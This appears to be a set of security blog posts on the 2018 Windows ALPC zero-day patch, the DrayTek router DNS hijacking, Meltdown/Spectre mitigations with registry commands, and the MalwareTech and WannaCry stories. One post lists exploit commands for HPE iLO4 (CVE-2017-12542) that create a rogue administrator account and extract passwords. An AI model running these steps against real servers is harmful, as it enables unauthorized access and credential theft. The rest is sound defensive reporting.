Category: Cyber Security

Microsoft fixes the recent ALPC zero-day in time for September 2018 Patch Tuesday

Microsoft fixes the recent ALPC zero-day in time for September 2018 Patch Tuesday

Last week a security researcher known on Twitter as SandboxEscaper decided to go out with a bang by revealing a zero-day effecting Windows operating systems in the form of a tweet rather than submitting a bug report to Microsoft. SandboxEscaper additionally posted a link to a proof-of-concept on Github, just encase anyone doubted the vulnerability.

The zero-day was in-turn verified by US-CERT (kb article here), Microsoft said in a statement to The Register that it would “proactively update impacted devices as soon as possible.”

The zero-day is in Microsoft Windows task scheduler SchRpcSetSecurity This component (or rather the API within it) contains a vulnerability in how it handles Advanced Local Procedure Call (ALPC). That vulnerability in ALPC can then allow an authenticated user to overwrite the contents of a file that should be protected by filesystem ACLs. This in-turn can then be leveraged to gain SYSTEM privileges. This vulnerability was then incorporated into a current malware distribution campaign by the cyber-criminal group known as PowerPool.

Now let’s get to today, Microsoft has released their September installment or patches and this batch contains 62 important fixes with the most noted being the ALPC Zero-Day tracked as CVE-2018-8440.

Currently it is important to note that this vulnerability is being actively used and their is no “official” mitigation, so the only Microsoft approved fix it to apply the patch as soon as possible, if you want the direct download links or links to the relevant KB article then please find them below.





Windows 10 for 32-bit Systems 4457132 Security Update
Windows 10 for x64-based Systems 4457132 Security Update
Windows 10 Version 1607 for 32-bit Systems 4457131 Security Update
Windows 10 Version 1607 for x64-based Systems 4457131 Security Update
Windows 10 Version 1703 for 32-bit Systems 4457138 Security Update
Windows 10 Version 1703 for x64-based Systems 4457138 Security Update
Windows 10 Version 1709 for 32-bit Systems 4457142 Security Update
Windows 10 Version 1709 for 64-based Systems 4457142 Security Update
Windows 10 Version 1803 for 32-bit Systems 4457128 Security Update
Windows 10 Version 1803 for x64-based Systems 4457128 Security Update
Windows 7 for 32-bit Systems Service Pack 1 4457144 Monthly Rollup
4457145 Security Only
Windows 7 for x64-based Systems Service Pack 1 4457144 Monthly Rollup
4457145 Security Only
Windows 8.1 for 32-bit systems 4457129 Monthly Rollup
4457143 Security Only
Windows 8.1 for x64-based systems 4457129 Monthly Rollup
4457143 Security Only
Windows RT 8.1 4457129 Monthly Rollup 
Windows Server 2008 for 32-bit Systems Service Pack 2 4458010 Monthly Rollup
4457984 Security Only
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) 4458010 Monthly Rollup
4457984 Security Only
Windows Server 2008 for Itanium-Based Systems Service Pack 2 4458010 Monthly Rollup
4457984 Security Only
Windows Server 2008 for x64-based Systems Service Pack 2 4458010 Monthly Rollup
4457984 Security Only
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) 4458010 Monthly Rollup
4457984 Security Only
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 4457144 Monthly Rollup
4457145 Security Only
Windows Server 2008 R2 for x64-based Systems Service Pack 1 4457144 Monthly Rollup
4457145 Security Only
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) 4457144 Monthly Rollup
4457145 Security Only
Windows Server 2012 4457135 Monthly Rollup
4457140 Security Only
Windows Server 2012 (Server Core installation) 4457135 Monthly Rollup
4457140 Security Only
Windows Server 2012 R2 4457129 Monthly Rollup
4457143 Security Only
Windows Server 2012 R2 (Server Core installation) 4457129 Monthly Rollup
4457143 Security Only
Windows Server 2016 4457131 Security Update
Windows Server 2016 (Server Core installation) 4457131 Security Update
Windows Server, version 1709 (Server Core Installation) 4457142 Security Update
Windows Server, version 1803 (Server Core Installation) 4457128 Security Update
HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

This shows just a few notes for exploiting CVE-2017-12542.  I am currently looking at various RCE’s and backdoors available for different iLO versions and will hopefully do more articles soon.

How to list user accounts on HPE iLO 4
If you just need to list user accounts on the HPE iLO, you can use the following python script // or Metasploit module (//

$ git clone //
$ cd CVE-2017-12542
$ python -t x.x.x.x
[+] Target is VULNERABLE!
[+] Account name: User Account Username: Administrator

How to create a new user on HPE iLO 4
Should you want to create a new account on the HPE iLO, you can use the same script as above from // or Metasploit module (//

$ git clone // $ cd CVE-2017-12542
$ python -u newadmin -p newadmin x.x.x.x

RCE on the HPE iLO
The Backdoor can be located at // and following HPE’s advisory it looks like all versions prior to version 2.53 for iLO4 are effected, as such if you are useing an old version in the corporate environment then you please consider upgrading the firwmware to version xx which can be obtained directly from HPE via this link to ver 2.60(30 May 2018).

Steps on how to get command execution on HP iLO and extract passwords

$ git clone //
$ curl -s -k  //x.x.x.x/xmldata?item=all | grep -i “<FWRI>”

$ wget //

$ chmod 755 CP032487.scexe

$ ./CP032487.scexe –unpack=/tmp/iLO

$ cd ilo4_toolbox/scripts/iLO4/

$ ./ ilo4_253.bin

$ python x.x.x.x



DrayTek Routers suffering a zero-day attack in the wild!

DrayTek Routers suffering a zero-day attack in the wild!

DrayTek is a manufacturer of broadband CPE (Customer Premises Equipment), including firewalls, VPN devices, routers and wireless LAN devices. On Friday it was announced that hackers have been exploiting a zero-day vulnerability to change the DNS settings on some Draytek routers. Initially, several users started reporting finding their DNS servers settings had been changed to an unknown server with the address of and the secondary set as googles server.

After users were chasing Draytek for a response the company eventually responded.

Draytek issued a security advisory on it’s UK site and another advisory on its international site. The initial advisory covers checking your routers settings to see if you are affected and the advisory on the international site covers all affected devices with promises that firmware to resolve the vulnerability is either already available or will be available imminently; of which the ;list below covers the affected devices and the firmware version required to resolve the zero-day:

Vigor120, version

Vigor122, version

Vigor130, version

VigorNIC 132, version

Vigor2120 Series, version

Vigor2132, version

Vigor2133, version

Vigor2760D, version

Vigor2762, version

Vigor2832, version

Vigor2860, version 3.8.8

Vigor2862, version

Vigor2862B, version

Vigor2912, version

Vigor2925, version

Vigor2926, version

Vigor2952, version

Vigor3220, version

VigorBX2000, version

VigorIPPBX2820, version

VigorIPPBX3510, version

Vigor2830nv2, version

Vigor2820, version

Vigor2710, version

Vigro2110, version

Vigro2830sb, version

Vigor2850, version

Vigor2920, version

Initially many were speculating that this would be due to users using default credentials however via collaboration from the tech community it has been verified that some of the affected devices were not using default credentials and even that when the DNS settings were changed no entries in the syslog revealed via what method or account, leading to speculation that this is an issue with the DrayTek code and confirming why this can only be resolved via upgrading the firmware.

Using the internet search tool “Shodan” I can see that there are currently 802,389 DrayTek devices openly available on the internet (some of these may already be patched), my point in using this figure is that even though this is a Taiwanese company most of these devices that are publicly available are located in the United Kingdom and the Netherlands.


So why would a hacker want to change your DNS server?

By changing your DNS provider to a server controlled by a hacker they can then redirect you to a clone of the website you intended to go to but instead one controlled by them, for example, the Office 365 login screen. Once there when you enter your login details they can then capture that data and redirect you to the legitimate site so you wouldn’t even necessarily realise it had happened, but by that point, it would be too late and they would already have your details. As such this serves as a crucial reminder to use two-factor authentication (2FA) where possible so that even if a hacker obtained your credentials they wouldn’t be able to log in.

HPE iLO Firmware Download Links

HPE iLO Firmware Download Links

**Updated 23/07/2018**


Using the links below you can download the recent HPE iLO (Integrated Lights-Out) firmware files (to get to the .bin file you will need to extract the .exe with 7zip and then install via the iLO webpage, or run the .exe on the server itself),these are all i could find on HPE’s website :

  1. iLO1 Latest : ilo196.bin (30-Apr-2014)
  2. iLO2 Latest : ilo2_232.bin (18-Feb-2018)
  3. iLO3 Latest : ilo3_189.bin (07-Jul-2017)
  4. iLO4 Latest :  ilo4_260.bin (23-May-2018)
  5. iLO5 Latest :  ilo5_130.bin (4-Jun-2018)












An Easy Guide For How To Mitigate Spectre And Meltdown

An Easy Guide For How To Mitigate Spectre And Meltdown

Are you stuck trying to understand how to protect your devices or company against Spectre and Meltdown? Well you are unfortunately not alone. This article should help clear it up though.

Ever since the two vulnerabilities nicknamed Spectre and Meltdown effecting multiple CPU’s dating back to 1995 got leaked a few weeks back vendors have been rushing to release patches and updates to mitigate the issue.

This initial flood of patches has not been smooth and there has been a lot of incompatibility issues and general finger pointing and frustration. To help clear up some misconceptions, I’ve put the following guide together that walks through various major updates to operating systems and browsers, explaining how they address Meltdown and/or Spectre, what they specifically don’t address, and any known compatibility or performance issues that have been reported.

Meltdown and Spectre – What are they?

Before we dive in, here’s a quick explanation of what Meltdown and Spectre are all about.

Meltdown (CVE-2017-5754)

Meltdown is a vulnerability effecting CPU’s that allows a user program to access privileged kernel-mode memory. It affects all out-of-order execution Intel processors released since 1995 with Itanium and pre-2013 Atoms being the only exceptions. A list of vulnerable ARM processors and mitigations is listed here. No AMD processors are affected by Meltdown.

Out of the two vulnerabilities, Meltdown is the easier one to fix, and can most commonly be addressed by applying an Operating System update.

Spectre (CVE-2017-5753, CVE-2017-5715)

Spectre is observed to be much more of a whole new attack vector rather than just a standard vulnerability. It’s enabled by the unintended side effects of speculative execution (this is what processors do to achieve higher speeds as they will make assumptions over what they will be asked and the possible results so that when they are asked they will hopefully already have the answer available or at least already working on a solution).

There are two different variants of Spectre — the first variant (bounds check bypass, CVE-2017-5753) and the second (branch target injection, CVE-2017-5715). Both variants can potentially allow attackers to obtain and extract information from other running processes (e.g. stealing login cookies from Internet Browsers).

AMD, ARM and Intel processors have all been reportable vulnerable to Spectre by various degrees, and this poses significant patching problems. While operating system and browser updates have helped mitigate the risk of Spectre to some degree, many experts agree the only true fix is a hardware update. As such, Spectre is likely to remain an issue for many years to come.

Source: SANS / Rendition Infosec. See the full presentation here

It’s important to note that both vulnerabilities are for information disclosure. Neither vulnerability allows remote execution – in other words, they don’t allow attackers to run malware.


Operating System updates

Windows updates

Microsoft’s processes for their Security Update to address Meltdown and Spectre has a bit of a roller-coaster, tainted by incompatibility issues with Anti-Virus software and AMD processors. For some scenarios, the deployment of the 2018-01 Security update has had to be put on hold or restricted altogether.

More details and direct download links to the updates below:

  • Windows 10
  • Windows 8 and Windows Server 2012
  • Windows 7 and Windows Server 2008

What the Microsoft Patches address:

  • Spectre variant 1, bounds check bypass (CVE-2017-5753)
  • Meltdown, rogue data cache load (CVE-2017-5754) –

The original Security update did not provide the mitigation for 32bit OS’s (x86 based OS). 
Microsoft Advisory Regarding 32bit: The 32 bit update packages listed in this advisory fully addressed CVE-2017-5753 and CVE-2017-5715, but did not provide protections for CVE-2017-5754 at this time. Microsoft continued to work with the affected chip manufacturers and have now released an additional Security update to address/mitigate (CVE-2017-5754) for 32bit OS’s : KB4073291

What they don’t address:

  • Currently the second variant of Spectre, branch target injection (CVE-2017-5715) – at present firmware updates are required to fully address Spectre variant 2.

Known issues:

Key=”HKEY_LOCAL_MACHINE” Subkey=”SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat” Value=”cadca5fe-87d3-4b96-b7fb-a231484277cc” Type=”REG_DWORD”Data=”0x00000000”

This resulted in a lot of initial confusion from the sector, with all the anit-virus companies providing different updates or some just went silent this did not help, some were setting the registry key for their customers and others requested that users set it themselves. The situation only gets more complicated considering many organisations have more than one Anti-Virus solution to maintain.

Should you use one of Microsoft’s own solutions; Microsoft clarified that Windows Defender Antivirus, System Center Endpoint Protection, and Microsoft Security Essentials are all compatible with the update and that they do set the registry key.

This means that if you have one of those built-in Microsoft protections enabled the registry key should be set automatically — no further, manual action should be necessary.  However, if you use a third-party antivirus then two things can happen, if Microsoft officially recognises the Anti-Virus software then Windows Defender and Microsoft Security Essentials should automatically be turned off so your third party Anti-Virus will require the update. Should Microsoft not officially recognise your Anti-Virus then Windows Defender or Microsoft Security Essentials will update the registry key when your third party Ant-Virus may not be support the update which could mean blue screen issues.

Kevin Beaumont has created a spreadsheet to keep track of the antivirus vendors and whether they make this key: //


To manually add the registry key and obtain the update now you can enter the following into a command prompt window (as admin) and then run Windows Update ( does not accept any liability for any issues that could arise as a result and would recommend you contact Microsoft and your AV provider prior to doing this): 

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat" /v "cadca5fe-87d3-4b96-b7fb-a231484277cc" /t REG_DWORD /d "0x00000000" /f
  • AMD compatibility issues:  Initially reported at the Verge, Microsoft had received numerous reports of PCs running AMD processors getting into a boot loop after installing the latest Windows security update. After some investigation, the company confirmed that there were issues, and temporarily stopped delivering the update to AMD devices. If you are effected by the AMD incompatability with the Windows Update then you will need to visit Microsoft’s support site for details on getting your machine(s) back up and running. Microsoft announced on the 18th January that it will resume rolling out patches for AMD devices running Windows 7 SP1 and Windows Server 2008 R2 SP1, Windows 8.1 and Windows Server 2012 R2, and the latest version of Windows 10… 1709. Updates for four older versions of Windows 10 – 1511, 1607, and 1703 – are still on-hold. As are updates for Windows Server 2016 and Windows 10 Enterprise.
  • Group or MDM policy configurations may be disabling updates: According to Microsoft, if you have Group or MDM policy settings configured to disable preview builds, your machines may not be receiving updates (see what those settings are here). To fix that, Microsoft recommends temporarily changing Group/MDM policy settings to “Not Configured” and changing them back once the updates have been installed.
  • Performance implications: Just as with the other operating systems, patches addressing Meltdown and Spectre are expected to take varied but non major change in performance. In a blog post, Microsoft Executive VP Terry Myerson explained the implications of the fixes can vary depending on factors such as; the version of Windows running and the age of the machine:
    • Windows 10 on circa-2016 PCs with Skylake, Kabylake, or newer CPU: Single-digit slowdowns, which most users shouldn’t notice.
    • Windows 10 on circa-2015 PCs with Haswell or older CPU: Slowdown can be more noticable. Some users may notice a decrease in performance.
    • Windows 8 or Windows 7 on circa-2015 PCs with Haswell or older CPU: Most users will likely notice a decrease in  performance.
    • Windows Server (any CPU): Mitigation’s to isolate code within a Windows Server instance results in a more significant performance impact but as with the above it will very much depend on the workload and age of the hardware. According to Myerson, “This is why you want to be careful to evaluate the risk of untrusted code for each Windows Server instance, and balance the security versus performance trade-off for your environment.”

Enabling protections for Windows Server

Microsoft has also advised Windows Server customers that they need to take the additional step of adding the following registry keys in order to enable patch protections.

To enable the fix:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 0 /f 

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f 

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization" /v MinVmVersionForCpuBasedMitigations /t REG_SZ /d "1.0" /f


If this is a Microsoft Hyper-V host and the firmware updates have been applied you will need to fully shutdown all Virtual Machines, the mitigation will not take effect until the VM’s next boot up. When you restart the host make sure to shutdown all Virtual Machines then restart the host, do not “Save” or “Pause” a VM for the reboot since the VM has to boot from scratch for the mitigation to take effect.

To disable this fix:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f 

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f


Again you will need to fully restart the Hyper-V host and Virtual Machines for this change to take effect. (Note there is not any requirement to change MinVmVersionForCpuBasedMitigations to disable the mitigations.)

Microsoft also notes that for Hyper-V hosts, live migration between patched and un-patched hosts may fail. The company also points to an alternative protection mechanism you can use on hosts that don’t have updated firmware yet.

Additional guidance from Microsoft:

Verifying new Windows protections are enabled:

To help confirm whether updates have been implemented correctly Microsoft has provided a PowerShell script that system administrators can run to test Meltdown and Spectre mitigations.

The following command will install the PowerShell module:

PS > Install-Module SpeculationControl

Note: There are a couple of requirements for running this command. First, you’ll need to be running PowerShell with admin privileges and may need to adjust execution policy. Also, the Install-Module command was introduced to PowerShell in version 5.0. Most Windows 7 machines will not have this version, due to the upgrades being optional and unrelated to security. Any device with an older version of PowerShell can still run the “Get-SpeculationControlSettings” function, however, only as long as you obtain the contents of the script and run it ad-hoc.

Once installed, the following command will run the test to check your system:

PS > Get-SpeculationControlSettings

The output will look something like this:

Results for Spectre protections

The first group – “Speculation control settings for CVE-2017-5715 [branch target injection] – refer to the protections in place for the Spectre vulneralbility. If the value for “Windows OS support for branch target injection mitigation is present” is “True” then the Windows Security update has been successfully installed.

The other red text in that section confirm that more complete mitigation for Spectre requires firmware updates, of which Intel has said it’s in the process of rolling these out. According to the company, updates for more than 90 percent of its processor products should be introduced by the end of next week.

Results for Meltdown protections

The second group – “Speculation control settings for CVE-2017-5754 [rogue data cache load] – refers to the protections in place for the Meltdown vulnerability. If you see the following results and no red lines then you’ve confirmed the Windows Security update has been successfully implemented and the machine is protected:

Hardware requires kernel VA shadowing: True Windows OS support for kernel VA shadow is present: True Windows OS support for kernel VA shadow is enabled: True Windows OS support for PCID optimization is enabled: True

Test results confirming successful mitigation of the Meltdown vulnerability

If you see any red lines in this section then that means the update has not been successfully applied. For more details on interpreting the PowerShell script output, Microsoft has a full results key here.

MacOS and iOS updates

Apple included mitigations to address Meltdown in its macOS 10.13.2 and iOS 11.2 updates released in December. They have since followed up with additional mitigations addressing the Spectre vulnerability with the recently released macOS High Sierra 10.13.2 Supplemental Update and iOS 11.2.2 update.

What they address:

  • Meltdown (CVE-2017-5754)
  • Spectre (CVE-2017-5753 and CVE-2017-5715) to some extent

What they don’t’ address:

  • Spectre (CVE-2017-5753 and CVE-2017-5715) to some extent
    Apple says its latest updates to MacOS, iOS, and Safari overall help to mitigate the risk of Spectre being exploited, however the company acknowledges it will be continuing to develop and test further mitigations.

No reported issues



Browser updates

Security researchers have been advising that the most likely use case/exploitation of Spectre is most likely to be web-based attacks using JavaScript (as an example, a malicious ad) to leak information, session keys, etc. cached in the browser. Given this, Google, Mozilla, Apple, and Microsoft have all either issued or scheduled new updates for their browsers to reduce that risk.

What browser updates address:

  • Spectre (CVE-2017-5753 and CVE-2017-5715) to some extent

What browser updates dont’ address:

  • Meltdown (CVE-2017-5754)
    You will still need to apply Operating System updates to mitigate Meltdown.


Google has announced it will be including the mitigations for Spectre starting with Chrome 64, which will be released on or around January 23. For the time being, Chrome users are advised to enable site isolation, which can help prevent the possibility of one site stealing data from another site.


Mozilla has already issued Firefox version 57.0.4, which helps address Spectre by disabling or reducing Firefox’s internal timer functions and disabling the SharedArrayBuffer feature. Firefox users can take additional precaution by enabling site isolation, as well.


Apple has released Safari 11.0.2 to specifically mitigate the effects of Spectre.

IE and Edge

Microsoft has made changes to both Internet Explorer 11 and Microsoft Edge to mitigate Spectre. In addition to removing support for SharedArrayBuffer from Edge, it has made changes to reduce the precision of several time sources to make successful attacks more difficult.


Firmware updates

Operating System and Internet Browser updates only partially mitigate Meltdown and Spectre. UEFI firmware and BIOS updates, are also required to further mitigate against them. If and when updates will be pushed out will vary from vendor to vendor, adding yet another layer of complexity, uncertainty and frustration to patching. This could easily result in only obtaining the updates by proactively checking for updates from PC/Server Manufacturers periodically over the coming few days or weeks.


Intel has released new Linux Processor microcode data files that can be used to add Meltdown and Spectre mitigations without having to perform a BIOS update.

Intel promised firmware updates for 90 percent of the affected processors made in the past five years by the 15th January. So far, it looks as though they are on-track and it now is resting on the downstream vendors/distributors to complete testing and deployment to their respective customer bases of-which these microcode fixes apply to a specific list of processors provided here.

The microcode updates can be obtained directly from Intel, of which Bleeping Computer has provided instructions and a video example to help walk admins through the install process here. It should be noted that some issues have already been reported with the updates, specifically around unwanted reboots. While Intel initially confirmed machines with Broadwell and Haswell CPUs were experiencing that issue, however later Intel acknowledged machines running newer processors were affected as well.

Windows users need to wait until Microsoft finalizes testing the microcode and releases an additional update to add in these further mitigations.

Known issues:

  • Older Intel Broadwell and Haswell CPUs experiencing sudden reboots: Intel has confirmed they have received reports of some glitches resulting from the firmware update on systems running Intel Broadwell and Haswell CPUs.
  • Newer Intel CPUs also experiencing sudden reboots: Intel has confirmed the firmware update is causing machines with Ivy Bridge, Sandy Bridge, Skylake, and Kaby Lake processors to suffer from sudden reboots too.
  • Performance impact: Information regarding the potential performance implications as a result of these updates have been inconsistent, however Intel has most recently said the patches are slowing processors down by six percent in certain situations. Intel has shared more details on performance impact based on specific workloads in a chart you can find here.

NOTE: Intel has currently requested customers stop installing its firmware update, they are aware of the issue and are working on a resolution


AMD has officially acknowledged that its processors are vulnerable to both variants of Spectre, but denies being vulnerable to Meltdown. While AMD says that OS, patches are sufficient to mitigate the first variant for Spectre, they have also started rolling out optional microcode updates starting last week; the initial fixes are focused on the Ryzen and EPYC processors.

Known issues:

  • Windows OS update compatibility issues: As first reported at the Verge, Microsoft had received numerous reports of PCs running AMD processors getting into a boot loop after installing the latest Windows security update. After some investigation, the company confirmed that there were issues, and temporarily stopped delivering the update to AMD devices. Affected users needed to visit Microsoft’s support site for instructions on getting their machines back up and running. Microsoft announced on the 18th January that it will resume rolling out patches for AMD devices running Windows 7 SP1 and Windows Server 2008 R2 SP1, Windows 8.1 and Windows Server 2012 R2, and the latest version of Windows 10… 1709. Updates for four older versions of Windows 10 – 1511, 1607, and 1703 – are still on-hold. As are updates for Windows Server 2016 and Windows 10 Enterprise.


Right now the priority is not to stress and not to rush out and deploy all the updates you can find, instead take a step back and asses the situation and work-out how you can best mitigate these vulnerabilities. At present I would concentrate on Operating System and Internet Browser updates if your Anti-Virus is up-to date, the Firmware updates are fresh and seem to be experiencing more issues so I would hold of on them a little bit longer whilst the dust settles and you can be reassured of their stability. As always remember to test before mass scale deployment and make sure you have a proven restore-able Backup to revert to encase you encounter any issues.

Fresh information surrounding Meltdown and Spectre is coming out everyday, so there is likely much more to come. I will be following closely and providing updates as soon as possible.

CPU Flaws – Meltdown and Spectre

CPU Flaws – Meltdown and Spectre

Two vulnerabilities called Meltdown and Spectre have recently been discovered, you have probably seen these in the news over the past 24 hours since they since they effect most modern processors and allow malicious programs to steal information from the memory of other programs. This means that a malicious program could steal passwords, account information, encryption keys, or theoretically anything stored in the memory of a process.

Most vendors have started to release information surrounding how customers can protect themselves from Spectre or Meltdown and to what extents they are vulnerable. To make it easier to find this information, I will be adding some key information and links to various advisories as they are released.



CVE-2017-5753, CVE-2017-5715, and CVE-2017-5754


CPU hardware implementations are vulnerable to side-channel attacks. These vulnerabilities are referred to as Meltdown (// and Spectre (//


An attacker able to execute code with user privileges can achieve various impacts, such as reading otherwise protected kernel memory and bypassing KASLR.

CVSS Metrics (Learn More (//

Group                                   Score                     Vector

Base                                      1.5                          AV:L/AC:M/Au:S/C:P/I:N/A:N

Temporal                             1.2                          E:POC/RL:OF/RC:C

Environmental                  2.0                          CDP:ND/TD:H/CR:H/IR:ND/AR:ND



1. Update OS’s – this will mediate the issue so that the Operating system itself cannot be exploited but if the Operating System is re-installed or the update removed then the device would still be vulnerable.

2. Apply Firmware updates from OEM (CPU Microcode) when/if available – this should offer a full resolution to the vulnerabilities.

3. Replace CPU with one that isn’t vulnerable – The best option for ensuring you are not vulnerable but not the easiest or potentially quickest solution.

Windows Server and Client – antivirus


“The compatibility issue is caused when anti-virus applications make unsupported calls into Windows kernel memory. These calls may cause stop errors (also known as blue screen errors) that make the device unable to boot. To help prevent stop errors caused by incompatible anti-virus applications, Microsoft is only offering the Windows security updates released on January 3, 2018 to devices running anti-virus software from partners who have confirmed their software is compatible with the January 2018 Windows operating system security update.”

^^ We need to test and potentially contact AV providers and check their product is compatible, and make sure they add they registry key to say so.  Otherwise we aren’t getting protected.


Antivirus support chart

Microsoft will only distribute the security update released on January 3rd 2018 to devices where a particular registry key has been added by an installed antivirus vendor. Kevin Beaumont has created a spreadsheet to keep track of the antivirus vendors and whether they make this key: //


To manually add the registry key and obtain the update now you can enter the following into a command prompt window (as admin) and then run Windows Update ( does not accept any liability for any issues that could arise as a result and would recommend you contact Microsoft and your AV provider prior to doing this): 

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat" /v "cadca5fe-87d3-4b96-b7fb-a231484277cc" /t REG_DWORD /d "0x00000000" /f



Windows Server

Microsoft guidance for Windows Server: //

Important note: the patch is disabled by default for performance reasons.

To enable the mitigations

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 0 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f

MS SQL Server

SQL specific information to come out later today

Windows Client

Microsoft guidance for Windows Client: //

Mozilla Firefox

Firefox will be adding mitigations for websites trying to exploit in Firefox 57: //

Google Chrome

Chrome 64, due late January, will include protection for websites trying to exploit: //

Microsoft Edge and Internet Explorer 11

Microsoft have released an update yesterday which includes protection for websites trying to exploit: //

Amazon AWS – cloud

AWS has protected their customers: //


“The majority of Azure infrastructure has already been updated to address this vulnerability. Some aspects of Azure are still being updated and require a reboot of customer VMs for the security update to take effect. Many of you have received notification in recent weeks of a planned maintenance on Azure and have already rebooted your VMs to apply the fix, and no further action by you is required.”


ETA for completion of hypervisor level patching, 24-48 hours – MS will try to respect availability sets (if configured) – originally maintenance was planned for fabric to be updated over the following couple weeks but they have had to condense it so cant guarantee but will try to respect availability sets.

Reboot can take place at any time (e.g. they could reboot Azure VM’s during business hours)

AMD processors

Google Project Zero (GPZ) Research Title Details
Variant One Bounds Check Bypass Resolved by software / OS updates to be made available by system vendors and manufacturers. Negligible performance impact expected.
Variant Two Branch Target Injection Differences in AMD architecture mean there is a near zero risk of exploitation of this variant. Vulnerability to Variant 2 has not been demonstrated on AMD processors to date.
Variant Three Rogue Data Cache Load Zero AMD vulnerability due to AMD architecture differences.

The full advisory can be found here: //

Tom Lendacky, a software engineer at AMD, had posted a email to the Linux Kernel Mailing List stating:

“AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against.  The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault.

Disable page table isolation by default on AMD processors by not setting the X86_BUG_CPU_INSECURE feature, which controls whether X86_FEATURE_PTI is set.”

You can read the full post here: //


The Android team has updated their January 2018 bulletin with the following note:

“CVE-2017-5715, CVE-2017-5753, and CVE-2017-5754, a set of vulnerabilities related to speculative execution in processors, have been publicly disclosed. Android is unaware of any successful reproduction of these vulnerabilities that would allow unauthorized information disclosure on any ARM-based Android device.

To provide additional protection, the update for CVE-2017-13218 included in this bulletin reduces access to high-precision timers, which helps limits side channel attacks (such as CVE-2017-5715, CVE-2017-5753, and CVE-2017-5754) of all known variants of ARM processors.

We encourage Android users to accept available security updates to their devices. See the Google security blog for more details.”

The full bulletin can be found here: //


Apple has announced that All Mac systems and iOS devices are affected, with the following statement.

“Apple has already released mitigations in iOS 11.2, macOS 10.13.2, and tvOS 11.2 to help defend against Meltdown. Apple Watch is not affected by Meltdown. In the coming days we plan to release mitigations in Safari to help defend against Spectre. We continue to develop and test further mitigations for these issues and will release them in upcoming updates of iOS, macOS, tvOS, and watchOS.” //

Xen hypervisors



Suggested to patch these ASAP (currently awaiting to see if their are any issues) if you use hypervisor as a security layer (e.g. a bank or cloud provider).  Advisory and patches: //


WannaCry accidental hero MalwareTech arrested by FBI for role in Kronos Trojan

WannaCry accidental hero MalwareTech arrested by FBI for role in Kronos Trojan

The UK based Security Researcher who uses the handle @MalwareTechBlog, (aka Marcus Hutchins) and who became the self-professed accidental hero during the recent WannaCry outbreak that took place back in May has been arrested by the FBI for his involvement in the Kronos malware campaign that took place back in 2014-2015.

Yesterday, the FBI detained Marcus Hutchins after the DEF CON hacking conference in Las Vegas as he attempted to fly back home to London, where he works as a researcher for the Cyber Security firm Kryptos Logic. Shortly after his arrest, the Department of Justice unsealed an indictment against Marcus Hutchins. This indictment charges him for his involvement in creating the Kronos banking trojan, which was a piece of malware used to steal banking credentials in 2014 and 2015 and was designed to spread via emails, gathering financial details of the victims as it did. Furthermore included in the charge is that he was supposedly involved in the conspiracy to sell it for $3,000 on dark web markets like AlphaBay.

The news surrounding the arrest of Marcus Hutchins has shocked a lot of the Cyber Security community, after all Marcus is well known especially recently with his rise to fame in stopping the WannaCry outbreak, Marcus is a well respected person within the community and so this comes as quite damming news. It is not yet known exactly what evidence the FBI have on Marcus but it could have come from last month’s FBI and Europol seizure of the servers of AlphaBay, which happens to be the site mentioned in the indictment.

Friends of Marcus have reported he is currently located in the FBI’s Las Vegas field office, but the FBI is not releasing any comments at this time. As yet the evidence is unclear and judging by the indictment it seems the FBI believe Marcus built Kronos and an as yet unnamed co-conspirator released a video demo and sort to sell it, looking back we know that Marcus was researching Kronos around the time as he sought to get hold of a sample just as he did with WannaCry.

Lets face it the FBI has a history of incorrectly punishing security professionals who are doing good, so personally I am holding out on any judgment, and ultimately i want to know what evidence the FBI claim to have.

Your allowed to WannaCry now as it’s not over!

Your allowed to WannaCry now as it’s not over!

Friday is typically a day when everyone’s thought is on the weekend; time to relax, time to escape from work for a precious two days. Friday 12th May 2017 was not one of those days, that Friday the RansomWare game was changed, enter “WannaCry”.

As this particular Friday unraveled computer systems around the world were being taken down; from Telefonica in Spain, the NHS in the UK and FedEx in the US, my own first thoughts when I saw on the news that the NHS was facing major systems outages due to a new RansomWare strain was first “oh great another variant” and second “I wonder how it got in a spread so quickly, it almost looks like a coordinated attack given how much of the NHS has been hit”. Quickly news started to spread about it and the name was out for this new malware “WannaCry” (also known as “WCry” and “WannaDecrypt0r”) and by the evening everyone had heard of it.

WannaCry is just the payload, once that payload is delivered the target system is encrypted and a message is displayed ordering you to pay to get your files back, so the payload itself is a pretty standard form of RansomWare. The intriguing part is the delivery system which makes use of the EternalBlue exploit from the NSA toolkit released last month, via this exploit the payload can then be spread to nearly any Windows devices on the same network as the infected machine. The EternalBlue exploit allows the malware the capability to scan heavily over TCP port 445 (Server Message Block/SMB), spreading similar to a worm, it compromises hosts, encrypting the files stored on them and then demanding a ransom payment in the form of Bitcoin all the while scanning and spreading more allowing the payload to spread quickly around the network with no admin credentials required. An important note to make is that the malware is not just able to spread via internal networks but also externally facing hosts across the internet.

